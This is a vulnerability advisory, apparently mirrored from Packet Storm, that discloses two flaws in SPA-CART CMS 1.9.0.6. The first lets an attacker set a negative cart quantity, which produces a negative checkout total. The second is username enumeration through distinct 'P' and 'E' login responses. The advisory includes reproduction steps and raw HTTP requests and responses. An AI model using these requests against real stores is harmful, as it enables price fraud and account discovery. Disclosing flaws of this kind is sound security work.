Vulners
Lucene search
SPA-CART CMS 1.9.0.6 Username Enumeration / Business Logic Flaw
🗓️ 17 Jun 2024 00:00:00Reported by Andrey StoykovType 
packetstorm🔗 packetstormsecurity.com👁 286 Views
`# Exploit Title: Business Logic Flaw and Username Enumeration in
spa-cartcmsv1.9.0.6
# Date: 6/2024
# Exploit Author: Andrey Stoykov
# Version: 1.9.0.6
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/04/friday-fun-pentest-series-5-spa.html
<http://msecureltd.blogspot.com/>
Description
- It was found that the application suffers from business logic flaw
- Additionally the application is vulnerable to username enumeration on the
login page
Logic Flaw
Steps to Reproduce:
1. Checkout page and intercept HTTP POST request
2. Add minus quantity such as -10
3. The final price would come up as negative value
// HTTP POST request modifying the quantity to negative value
POST /cart/add HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[...]
productid=225&amount=-10
// HTTP response
HTTP/2 200 OK
Server: nginx
[...]
[...]
<img src="https://demo.spa-cart.com/var/photo/product/234x200/225/695/1.jpg"
alt="" /><b>Five And Two Jewelry Piper Gold-Plated Earrings</b> added to
cart
<br /><br />
<strong class="added_price">Price: <span><span
class="currency">$</span>59.00</span></strong>
<div class="added_options">
<b>Selected options:</b>
Qty: 1<br />
Color: silver gold<br />
</div>
[...]
// HTTP GET request to checkout
GET /checkout HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122
[...]
// HTTP response showing negative amount owned
HTTP/2 200 OK
Server: nginx
[...]
[...]
\t<td>silver gold<\/td>\r\n<\/tr>\r\n<\/table>\r\n <\/td>\r\n <td
class=\"line\" nowrap align=\"right\">\r\n<span
class=\"currency\">$<\/span>59.00 x -10 =
<span class=\"currency\">$<\/span>-590.00 <\/td>
[...]
Username Enumeration:
Steps to Reproduce:
1. Register account
2. Enter valid account with wrong password
3. Trap HTTP request
4. Check that response for valid username has "P" message
5. Enter invalid account with wrong password
6. Check that response for invalid username has "E" message
// HTTP POST request with valid username and wrong password
POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[...]
email=test%40test.test&password=test123
// HTTP response showing "P" error message
HTTP/2 200 OK
Server: nginx
[...]
P
// HTTP POST request with invalid username and wrong password
POST /login HTTP/2
Host: demo.spa-cart.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
[...]
email=test%40test.t3st&password=test123
// HTTP response showing "E" error message
HTTP/2 200 OK
Server: nginx
[...]
E
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4